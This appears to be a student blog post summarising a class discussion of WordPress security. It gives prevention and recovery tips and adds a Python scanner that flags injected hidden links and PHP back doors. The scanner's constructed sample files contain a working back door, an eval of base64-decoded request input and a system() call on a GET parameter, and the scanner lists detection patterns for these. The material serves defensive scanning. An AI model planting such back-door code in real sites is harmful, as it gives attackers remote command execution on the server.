This week’s chat topic was about WordPress Security. We were assigned to read the following website article and answer the subsequent questions.
What kinds of attacks are there?
There are two types of malware attacks aimed at WordPress:
Injections – your website code is injected with advertisements or links to another site.
Back Doors – a successful attack places a shell script (back door) on your server, allowing the attacker to access your site and run commands without logging in.
What mistakes are people making that make their sites vulnerable?
Environment – the system/server is not configured correctly or does not follow best practices
Administration – a site login/password that is too easy to guess
Vulnerabilities – outdated versions of PHP, WordPress, themes or plugins
What are 3 things you WILL do now?
Ensure a good username and strong password.
Backup site every night, keeping copies off-site.
Install a Firewall.
What are 3 things you won’t do now, but maybe later?
Research frequently on the web the new ways attackers are operating.
Know what malware remediation services are available in the event you need them.
Upgrade to the latest version of WordPress when feasible.
Our chat centered on a student who lived through the nightmare of having all his WP sites hacked at work – what he learned from this and how he handled the situation.
A student provided a resource that offers some great tips about security:
Genius Guide WordPress – Master the expert skills needed to create better blogs
Our instructor provided these great security tips:
1) Use good usernames and strong passwords. (Consider using a password manager like 1Password or LastPass.)
2) Backup everything every night and keep the copies of the backups off-site.
3) Least-privilege user accounts, correct system configuration, ModSecurity. Research on the web to find ways to prevent common exploits.
4) Firewalls like CloudFlare or Incapsula.
5) Scans that look for damage and clean up the mess: Sucuri and VaultPress.
6) Use a hosting service that is legit.
Recovery after an Attack…
1) Alert your host. They should take care of this for you; if they don’t, find a new host.
2) Replace all core WordPress files.
3) Start at all index.php files and move inward, inspecting each theme/plugin file for code that looks out of place.
4) Hire a malware remediation service to help.
5) Restore from your backup.
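As an added example (not part of the chat notes or of the course below), here is a small Python scanner for step 3, the "code that looks out of place" check: it walks a theme/plugin directory and flags the markers of the two attack types described above, hidden injected links and PHP back doors. The directory layout, file names and file contents are constructed samples, and the patterns are heuristics that point you at files to inspect by hand.

```python
import re
import tempfile
from pathlib import Path

# Heuristic indicators of the two attack classes: injected hidden content and
# PHP back doors. A hit means "inspect this file", not proof of compromise.
SUSPICIOUS_PATTERNS = [
    (r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(",
     "eval() of a decoded payload"),
    (r"\b(system|shell_exec|passthru|exec|popen)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b",
     "shell command built from request input"),
    (r"preg_replace\s*\(\s*['\"][^'\"]*/e['\"]",
     "preg_replace() with the /e (code execution) modifier"),
    (r"[A-Za-z0-9+/=]{200,}", "long base64-looking blob"),
    (r"<(iframe|a)\b[^>]*style\s*=\s*[\"'][^\"']*display\s*:\s*none",
     "hidden iframe or link"),
]

# Constructed sample files standing in for a theme directory after an attack.
SAMPLES = {
    "twentytwelve/footer.php": (
        "<?php /* clean footer */ ?>\n"
        "<footer><?php wp_footer(); ?></footer>\n</body></html>\n"),
    "twentytwelve/header.php": (
        "<?php /* injection: a hidden spam link appended to the header */ ?>\n"
        "<a href=\"http://example.invalid/\" style=\"display:none\">cheap pills</a>\n"),
    "twentytwelve/inc/wp-cache.php": (
        "<?php /* back door: runs whatever arrives in a request parameter */\n"
        "if (isset($_REQUEST['c'])) { eval(base64_decode($_REQUEST['c'])); }\n"
        "system($_GET['cmd']);\n"),
}

def scan_text(text):
    """Return the label of every suspicious pattern found in one file's text."""
    return [label for pattern, label in SUSPICIOUS_PATTERNS
            if re.search(pattern, text, re.IGNORECASE)]

def scan_tree(root):
    """Walk a themes/plugins tree and report only the PHP files with hits."""
    findings = {}
    for path in sorted(root.rglob("*.php")):
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings

def demo():
    """Write the constructed samples to a temp dir and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, body in SAMPLES.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body, encoding="utf-8")
        return scan_tree(root)

if __name__ == "__main__":
    for rel, hits in demo().items():
        print(f"{rel}: {', '.join(hits)}")
```

Point `scan_tree()` at a real wp-content/themes or wp-content/plugins directory to get the list of files worth opening first; the clean footer in the sample produces no hit, the two tampered files do.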
This course explains how to secure self-hosted WordPress sites, including site configuration, code modification, and the use of free plug-ins. Beginning with the basics of site security, author Jeff Starr explains how to harden a WordPress site by configuring authentication keys, setting proper file permissions, and removing version numbers. The course shows how to implement a firewall, prevent automated spam, and control proxy access, and concludes with a series of advanced tips and site security best practices.
- Backing up and restoring your site
- Setting up strong passwords
- Choosing trusted plugins and themes
- Protecting the configuration file and the admin directory
- Securing the login page
- Fighting comment spam
- Blocking access and detecting hacks
- Finding and reporting vulnerabilities
Note: You have to be a member of Lynda.com to view the entirety of the tutorials.